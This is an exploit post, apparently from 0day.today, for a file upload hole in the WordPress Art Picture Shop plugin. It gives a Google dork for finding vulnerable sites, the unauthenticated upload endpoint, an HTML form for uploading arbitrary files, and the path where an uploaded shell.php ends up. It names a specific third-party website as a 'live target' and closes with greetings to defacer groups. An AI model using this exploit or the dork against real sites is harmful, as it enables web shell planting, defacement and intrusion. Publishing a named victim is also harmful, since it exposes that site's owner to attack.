id: 27722
date: 05/05/2017
title: Wordpress Art Picture Shop Plugins File Upload Vulnerability
author: Berandal
cves: 

#################################################################################
# Wordpress Plugins Art Picture Shop File Upload Vulnerability | CSRF
# Author : Berandal
# Google Dork: inurl:/wp-content/plugins/art-picture-shop/admin/
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/
# [!] File Location : http://127.0.0.1/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/files/shell.php

#################################################################################
#CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# Live Target : http://wiecker-photography.de/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/
#################################################################################
# ABOUT:
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - 6host Party Coder's - Alone Clown Security
# All Indonesian Defacer.
#################################################################################

#  0day.today [2023-03-27]  #